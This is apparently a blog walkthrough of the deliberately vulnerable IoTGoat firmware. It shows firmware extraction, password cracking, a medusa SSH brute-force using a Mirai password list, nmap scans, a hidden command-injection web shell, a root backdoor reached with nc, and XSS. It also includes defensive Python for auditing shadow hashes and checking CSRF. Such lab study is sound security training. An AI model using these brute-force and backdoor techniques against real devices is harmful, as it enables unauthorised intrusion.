IoTGoat

Posted by Mr.Be1ieVe on Tuesday, November 3, 2020

No 1: Weak, Guessable, or Hardcoded Passwords:

$ find . -name cgi-bin
./www/cgi-bin

Searching: firmwalker

It will search through the extracted or mounted firmware file system for things of interest such as:

  • etc/shadow and etc/passwd
  • list out the etc/ssl directory
  • search for SSL related files such as .pem, .crt, etc.
  • search for configuration files
  • look for script files
  • search for other .bin files
  • look for keywords such as admin, password, remote, etc.
  • search for common web servers used on IoT devices
  • search for common binaries such as ssh, tftp, dropbear, etc.
  • search for URLs, email addresses and IP addresses
  • Experimental support for making calls to the Shodan API using the Shodan CLI

$ ./firmwalker.sh ../firmware/_IoTGoat-x86.img.extracted/squashfs-root/ ./IoTGoat.txt

/etc/shadow stores the real passwords in encrypted (hashed) form

root:$1$Jl7H1VOG$Wgw2F/C.nLNTC.4pwDa4H1:
|                |
1                2
  1. Username : It is your login name.

  2. Password: It is your encrypted password. The password should be at least 8-12 characters long, including special characters, digits, lower case letters and more. Usually the password format is set to

    $id$salt$hashed. The $id is the algorithm used; on GNU/Linux the values are as follows:

    1. $1$ is MD5
    2. $2a$ is Blowfish
    3. $2y$ is Blowfish
    4. $5$ is SHA-256
    5. $6$ is SHA-512

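As an added example (not code from this post, IoTGoat or firmwalker), the following Python script applies the $id$salt$hash convention above to audit an extracted shadow file and flag MD5-crypt and empty passwords; the root line is the one quoted above, the other sample entries are constructed.

```python
# Audit an extracted firmware /etc/shadow for weak or empty password hashes.
# Added example for this write-up (not IoTGoat or firmwalker code); it applies
# the $id$salt$hash convention described above to every entry in the file.
import re

HASH_IDS = {"1": "MD5 crypt", "2a": "Blowfish", "2y": "Blowfish",
            "5": "SHA-256 crypt", "6": "SHA-512 crypt"}  # crypt(3) ids listed above
WEAK_IDS = {"1"}  # MD5 crypt is cheap to crack, which is why john/medusa succeed
HASH_RE = re.compile(r"^\$([^$]+)\$([^$]*)\$(.*)$")


def parse_shadow_line(line):
    """Split one shadow entry into user, password field, $id$ and algorithm name."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2:
        raise ValueError("not a shadow entry: %r" % line)
    user, pw = fields[0], fields[1]
    m = HASH_RE.match(pw)
    if pw == "":
        algo = "none (empty password)"
    elif pw[0] in "!*":            # '!' or '*' prefix: account locked, no login
        algo = "locked"
    elif m:
        algo = HASH_IDS.get(m.group(1), "unknown $%s$" % m.group(1))
    else:
        algo = "legacy/unknown"    # e.g. 13-character DES crypt
    return {"user": user, "hash": pw, "id": m.group(1) if m else None, "algo": algo}


def audit_shadow(text):
    """Return (user, reason) pairs that a firmware review should flag."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        entry = parse_shadow_line(line)
        if entry["hash"] == "":
            findings.append((entry["user"], "empty password: login needs no password"))
        elif entry["id"] in WEAK_IDS:
            findings.append((entry["user"], "weak hash: " + entry["algo"]))
    return findings


# Constructed sample: the root line is the one quoted from IoTGoat above; the
# other entries are made up to exercise the locked, strong and empty cases.
SAMPLE_SHADOW = """\
root:$1$Jl7H1VOG$Wgw2F/C.nLNTC.4pwDa4H1:
daemon:*:0:0:99999:7:::
iotgoatuser:$6$saltsalt$madeuphashvalue:18500:0:99999:7:::
guest::18500:0:99999:7:::
"""
```

Run `audit_shadow(open("squashfs-root/etc/shadow").read())` against the extracted file system to get the same report for the real firmware.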

Cracking the passwords

$ john --show ./etc/shadow
0 password hashes cracked, 2 left

hashcat can also crack MD5 and other hashes; it is very powerful, but I am not very good at using it...

medusa

Hydra, Medusa, or Ncrack can all be used for brute forcing

Combined with SecLists

SecLists is the security tester’s companion. It’s a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.

Use the command awk '{print $2}' SecLists/Passwords/Malware/mirai-botnet.txt > SecLists/Passwords/Malware/mirai-botnet_passwords.txt to export the password column into a separate file

Then

$ medusa -u iotgoatuser -P ./SecLists/Passwords/Malware/mirai-botnet_passwords.txt -h 192.168.56.101 -M ssh

This brute-forces the SSH password: 7ujMko0vizxv

No 2: Insecure Network Services:

kali@kali:~/Desktop/IoTGoat$ nmap -p20-6000 192.168.56.101
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-09 02:45 EST
Nmap scan report for 192.168.56.101 (192.168.56.101)
Host is up (0.0026s latency).
Not shown: 5973 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
110/tcp  open  pop3
443/tcp  open  https
5000/tcp open  upnp
5515/tcp open  unknown

kali@kali:~/Desktop/IoTGoat$ sudo nmap -sU -p20-6000 192.168.56.101 > ScanUdpResult.txt
kali@kali:~/Desktop/IoTGoat$ cat ScanUdpResult.txt
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-09 03:20 EST
Nmap scan report for 192.168.56.101 (192.168.56.101)
Host is up (0.00058s latency).
Not shown: 5980 open|filtered ports
PORT   STATE SERVICE
53/udp open  domain
Nmap done: 1 IP address (1 host up) scanned in 16.01 seconds

But my UPnP does not seem to work, so I can only paste the walkthrough

nmap -p5000 -sV 172.16.100.213
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 23:10 EDT
Nmap scan report for IoTGoat (172.16.100.213)
Host is up (0.00045s latency).

PORT     STATE SERVICE VERSION
5000/tcp open  upnp    MiniUPnP 2.1 (UPnP 1.1)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5000-TCP:V=7.80%I=7%D=5/4%Time=5EB0D91A%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,124,"\x20501\x20Not\x20Implemented\r\nContent-Type:\x20text/h
SF:tml\r\nConnection:\x20close\r\nContent-Length:\x20149\r\nServer:\x20Ope
SF:nWRT/18\.06\.2\x20UPnP/1\.1\x20MiniUPnPd/2\.1\r\nExt:\r\n\r\n<HTML><HEA
SF:D><TITLE>501\x20Not\x20Implemented</TITLE></HEAD><BODY><H1>Not\x20Imple
SF:mented</H1>The\x20HTTP\x20Method\x20is\x20not\x20implemented\x20by\x20t
SF:his\x20server\.</BODY></HTML>\r\n")%r(GetRequest,117,"HTTP/1\.0\x20404\
SF:x20Not\x20Found\r\nContent-Type:\x20text/html\r\nConnection:\x20close\r
SF:\nContent-Length:\x20134\r\nServer:\x20OpenWRT/18\.06\.2\x20UPnP/1\.1\x
SF:20MiniUPnPd/2\.1\r\n
[SNIP]
</TITLE></HEAD><BODY><H1>Not\x20Implemented<
SF:/H1>The\x20HTTP\x20Method\x20is\x20not\x20implemented\x20by\x20this\x20
SF:server\.</BODY></HTML>\r\n");
MAC Address: 00:0C:29:00:AC:E7

Analyze the service detection response details and note information such as the service version (MiniUPnP 2.1), the server version (OpenWrt 18.06.2), and the error code details. Proceed with interrogating each listening service with aggressive scripts that aid in vulnerability identification based on service versioning. Try searching for appropriate nmap scripts in Kali Linux under the /usr/share/nmap/scripts directory. A UPnP example using the broadcast-upnp-info script is shown below.

nmap -sV --script=broadcast-upnp-info 172.16.100.213
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 23:39 EDT
Pre-scan script results:
| broadcast-upnp-info: 
|   239.255.255.250
|       Server: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1
|       Location: http://192.168.50.143:5000/rootDesc.xml
|         Webserver: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1
|         Name: OpenWRT router
|         Manufacturer: OpenWRT
|         Model Descr: OpenWRT router
|         Model Name: OpenWRT router
|         Model Version: 1
|         Name: WANDevice
|         Manufacturer: MiniUPnP
|         Model Descr: WAN Device
|         Model Name: WAN Device
|         Model Version: 20190130
|         Name: WANConnectionDevice
|         Manufacturer: MiniUPnP
|         Model Descr: MiniUPnP daemon
|         Model Name: MiniUPnPd
|_        Model Version: 20190130
[SNIP]
Nmap scan report for IoTGoat (192.168.50.143)
Host is up (0.00045s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      Dropbear sshd (protocol 2.0)
53/tcp   open  domain   dnsmasq 2.73
80/tcp   open  http     LuCI Lua http config
443/tcp  open  ssl/http LuCI Lua http config
5000/tcp open  upnp     MiniUPnP 2.1 (UPnP 1.1)
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html
|     Connection: close
|     Content-Length: 134
|     Server: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1
|     Ext:
|     <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL was not found on this server.</BODY></HTML>
|   GenericLines: 
|     501 Not Implemented
|     Content-Type: text/html
|     Connection: close
|     Content-Length: 149
|     Server: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1
|     Ext:
|     <HTML><HEAD><TITLE>501 Not Implemented</TITLE></HEAD><BODY><H1>Not Implemented</H1>The HTTP Method is not implemented by this server.</BODY></HTML>
|   HTTPOptions: 
[SNIP] 

No 3: Insecure Ecosystem Interfaces:

Hidden web shell

In the web server config file ./etc/config/uhttpd you can see lua_prefix

kali@kali:~/Desktop/IoTGoat/_IoTGoat-x86.img.extracted/squashfs-root$ cat ./etc/config/uhttpd | grep "/"
        option home             /www
        option cert             /etc/uhttpd.crt
        option key              /etc/uhttpd.key
        # Default is /cgi-bin
        option cgi_prefix       /cgi-bin
        list lua_prefix         "/cgi-bin/luci=/usr/lib/lua/luci/sgi/uhttpd.lua"

This lua_prefix maps the URL prefix to the corresponding file; see here for reference

Then under ./usr/lib/lua/luci/ you can see

├───cbi
├───controller
│   ├───admin
│   └───iotgoat
│   ├───cbi
│   │   ├───admin_network
│   │   ├───admin_status
│   │   ├───admin_system
│   │   │   └───fstab
│   │   ├───firewall
│   │   └───upnp
│   └───network
├───sgi
├───sys
│   └───zoneinfo
├───template
├───tools
    ├───admin_network
    │   └───index
    ├───admin_system
    ├───admin_uci
    ├───cbi
    ├───firewall
    ├───iotgoat
        └───bootstrap

In controller/iotgoat/iotgoat.lua you can see the index function

function index()
    entry({"admin", "iotgoat"}, firstchild(), "IoTGoat", 60).dependent=false
    entry({"admin", "iotgoat", "cmdinject"}, template("iotgoat/cmd"), "", 1)
    entry({"admin", "iotgoat", "cam"}, template("iotgoat/camera"), "Camera", 2)
    entry({"admin", "iotgoat", "door"}, template("iotgoat/door"), "Doorlock", 3)
    entry({"admin", "iotgoat", "webcmd"}, call("webcmd"))
end

view/iotgoat/ contains cmd.html

So just visit https://<IoTGoat_IP>/cgi-bin/luci/admin/iotgoat/cmdinject

A login password is required: iotgoathardcodedpassword

In cmd, enter telnet -p 9999; then you can connect from Linux with nc

For more on LuCI, see

LuCI framework: using a Lua web framework

OpenWrt LuCI wiki

Backdoor

Earlier, port 5515 was unknown; connecting to it with nc, it turns out to be a backdoor...

nc 192.168.56.102 5515
[***]Successfully Connected to IoTGoat's Backdoor[***]

ls
bin
boot
dev
dnsmasq_setup.sh
etc
lib
mnt
overlay
proc
rom
root
sbin
sys
tmp
usr
var
www

id
uid=0(root) gid=0(root)

XSS

Under Network/Firewall/Traffic Rules

The Name field of New forward rule and New source NAT has XSS

Quick overview: A brief discussion of XSS attacks (with common bypass techniques)

No 4: Lack of Secure Update Mechanism:

Insecure package update configuration defaults including CVE-2020-7982.

Remote command execution vulnerability in OpenWrt (CVE-2020-7982) [CN]

No 5: Use of Insecure or Outdated Components:

Several insecure and outdated software components with CVEs such as Dnsmasq, pppd, Linux Kernel, BusyBox, wpa_supplicant, and more.

Todo: auto scan

TLS 1.2

ssh 2.0

pppd 2.4.7

Dnsmasq 2.73

wpa_supplicant v2.7-devel

BusyBox v1.28.4

No 6: Insufficient Privacy Protection:

PII data captured and stored insecurely.

Personally identifiable information (PII)

The .db file found by firmwalker

##################################### *.db
/usr/lib/lua/luci/controller/iotgoat/sensordata.db

Then use sqlite3

kali@kali:~/Desktop/IoTGoat/_IoTGoat-x86.img.extracted/squashfs-root/usr/lib/lua/luci/controller/iotgoat$ sqlite3 sensordata.db 
SQLite version 3.32.3 2020-06-18 14:00:33
Enter ".help" for usage hints.
sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE sensors(id INTEGER PRIMARY KEY AUTOINCREMENT, temperature NUMERIC, humidity NUMERIC, currentdate DATE, currentime TIME, name TEXT, email TEXT, birthdate NUMERIC);
INSERT INTO sensors VALUES(1,22.399999999999998579,68,'2020-03-24','18:56:33','johnsmith','johnsmith@gmail.com',1311977);
INSERT INTO sensors VALUES(2,29.699999999999999289,98,'2020-03-24','18:56:43','jillsmith','jillsmith@gmail.com',4141979);
INSERT INTO sensors VALUES(3,31.199999999999999289,28,'2020-03-24','18:57:05','walter','waltergary@yopmail.com',32821969);
INSERT INTO sensors VALUES(4,16.899999999999998578,38,'2020-03-24','18:57:20','WilliamRonald','billronald@yopmail.com',11141989);
INSERT INTO sensors VALUES(5,35,78,'2020-03-24','18:58:04','Test','TstUser@aol.com',12121990);
INSERT INTO sensors VALUES(6,35,88,'2020-03-24','18:58:18','Sgt','sgtmajor@us.gov',10171956);
DELETE FROM sqlite_sequence;
INSERT INTO sqlite_sequence VALUES('sensors',6);
COMMIT;
sqlite> 

No 7: Insecure Data Transfer and Storage:

<IP>/cgi-bin/luci/admin/network/wireless/wl0.network1

The Wi-Fi has no password

No 8: Lack of Device Management:

<IP>/cgi-bin/luci/admin/status/syslog is not enabled

No 9: Insecure Default Settings:

Many included in IoTGoat such as missing secure headers to prevent framing as well as CSRF protections on sensitive requests.

Detecting CSRF vulnerabilities is fairly tedious work. The simplest method is to capture a normal request, remove the Referer field and resubmit it; if the submission still takes effect, you can be fairly sure a CSRF vulnerability exists.

Currently there are three main strategies for defending against CSRF attacks: verify the HTTP Referer field; add a token to the request and verify it; define a custom attribute in the HTTP header and verify it.

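As an added example (not part of this post or of LuCI), the following Python code implements two of the three strategies above, Origin/Referer verification and a per-session token, and shows how the "strip the Referer and resubmit" probe described above gets rejected; the device origin and the sample requests are assumed.

```python
# CSRF checks for a state-changing LuCI-style POST. Added example for this
# write-up, not IoTGoat or LuCI code. It implements two of the three strategies
# above (Referer/Origin verification and a per-session token); the device
# origin and the sample requests are assumed/constructed.
import hmac
import secrets
from urllib.parse import urlsplit

DEVICE_ORIGIN = "https://192.168.56.101"  # assumed IoTGoat address


def new_csrf_token():
    """Per-session secret; keep it server-side and embed it in every form."""
    return secrets.token_hex(16)


def referer_ok(headers):
    """Strategy 1: Origin (preferred) or Referer must name our own origin.
    A request carrying neither header is rejected, which is exactly what the
    'strip the Referer and resubmit' test above probes for."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    u = urlsplit(src)
    return "%s://%s" % (u.scheme, u.netloc) == DEVICE_ORIGIN


def token_ok(form, session_token):
    """Strategy 2: the token echoed in the body must equal the session token.
    compare_digest avoids leaking the token through timing differences."""
    sent = form.get("csrf_token", "")
    return bool(sent) and hmac.compare_digest(sent, session_token)


def csrf_safe(request, session_token):
    """Accept a sensitive request only when both checks pass."""
    return referer_ok(request["headers"]) and token_ok(request["form"], session_token)


# Constructed sample requests (dicts standing in for the parsed HTTP request).
SESSION_TOKEN = "0123456789abcdef0123456789abcdef"  # fixed here; use new_csrf_token()
GOOD = {"headers": {"Referer": DEVICE_ORIGIN + "/cgi-bin/luci/admin/network/firewall"},
        "form": {"name": "rule1", "csrf_token": SESSION_TOKEN}}
NO_REFERER = {"headers": {}, "form": dict(GOOD["form"])}           # the manual test above
CROSS_SITE = {"headers": {"Origin": "https://attacker.invalid"},   # forged from elsewhere
              "form": {"name": "rule1"}}
```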

No 10: Lack of Physical Hardening:

Physical hardening presumably refers to protecting the firmware
